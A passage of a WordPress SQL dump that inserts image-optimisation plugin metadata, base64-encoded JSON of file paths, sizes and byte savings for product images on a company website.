pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NjI2LCJ0aW1lIjoxNDgzNTc1NjM1LCJpZCI6MTExMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLWdyZWFzZS1oaWdoLXRlbXAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLWdyZWFzZS1oaWdoLXRlbXAtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLWdyZWFzZS1oaWdoLXRlbXAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjcxMCwidGltZSI6MTQ4MzU3NTYzOCwiaWQiOjExMTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNjI1LCJ0aW1lIjoxNDgzNTc1NjQyLCJpZCI6MTExMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NjY3LCJ0aW1lIjoxNDgzNTc1NjQ1LCJpZCI6MTExMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NzY3LCJ0aW1lIjoxNDgzNTc1NjQ5LCJpZCI6MTExMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6ODk5LCJ0aW1lIjoxNDgzNTc1NjUyLCJpZCI6MTExMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtZ3JlYXNlLWhpZ2gtdGVtcC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTIxNiwidGltZSI6MTQ4MzU3NTY1NiwiaWQiOjExMTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLWdyZWFzZS1oaWdoLXRlbXAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLWdyZWFzZS1oaWdoLXRlbXAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLWdyZWFzZS1oaWdoLXRlbXAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEzNzcsInRpbWUiOjE0ODM1NzU2NjAsImlkIjoxMTEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1ncmVhc2UtaGlnaC10ZW1wLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxOTM3LCJ0aW1lIjoxNDgzNTc1NjY0LCJpZCI6MTExMn1d'); 
INSERT INTO `wp_postmeta` VALUES (29738, 1109, 'wpfc_optimisation_reduction', '12221'); 
INSERT INTO `wp_postmeta` VALUES (29739, 1109, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEuanBnIiwid2lkdGgiOjM4NzIsImhlaWdodCI6MjU5MiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NTY2OCwiaWQiOiIxMTA5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjUwNSwidGltZSI6MTQ4MzU3NTY3MiwiaWQiOjExMDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS04MDB4NTM2LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtODAweDUzNi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTgwMHg1MzYuanBnIiwicmVkdWN0aW9uIjo5NjgsInRpbWUiOjE0ODM1NzU2NzYsImlkIjoxMTA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtNzY4eDUxNC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTc2OHg1MTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS03Njh4NTE0LmpwZyIsInJlZHVjdGlvbiI6OTIxLCJ0aW1lIjoxNDgzNTc1NjgwLCJpZCI6MTEwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTE2MDB4MTA3MS5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDcxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMTYwMHgxMDcxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMTYwMHgxMDcxLmpwZyIsInJlZHVjdGlvbiI6NDIwNSwidGltZSI6MTQ4MzU3NTY4NSwiaWQiOjExMDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjYsInRpbWUiOjE0ODM1NzU2ODgsImlkIjoxMTA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ3LCJ0aW1lIjoxNDgzNTc1NjkxLCJpZCI6MTEwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ2OSwidGltZSI6MTQ4MzU3NTY5NCwiaWQiOjExMDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo3NDcsInRpbWUiOjE0ODM1NzU2OTgsImlkIjoxMTA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NjgsInRpbWUiOjE0ODM1NzU3MDIsImlkIjoxMTA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0ODgsInRpbWUiOjE0ODM1NzU3MDUsImlkIjoxMTA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo1MDEsInRpbWUiOjE0ODM1NzU3MDgsImlkIjoxMTA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo2MzAsInRpbWUiOjE0ODM1NzU3MTIsImlkIjoxMTA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MjksInRpbWUiOjE0ODM1NzU3MTYsImlkIjoxMTA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZTEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2UxLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo3MTcsInRpbWUiOjE0ODM1NzU3MTksImlkIjoxMTA5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29740, 1107, 'wpfc_optimisation_reduction', '2103465'); 
INSERT INTO `wp_postmeta` VALUES (29741, 1107, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3OTk4NDI2LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3OTk4NDI2LmpwZyIsIndpZHRoIjozNTA0LCJoZWlnaHQiOjIzMzYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc5OTg0MjYuanBnIiwicmVkdWN0aW9uIjoyMTAzNDEzLCJ0aW1lIjoxNDgzNTc1NzMxLCJpZCI6IjExMDcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzk5ODQyNi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzk5ODQyNi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzk5ODQyNi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTczMywiaWQiOjExMDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3OTk4NDI2LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3OTk4NDI2LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub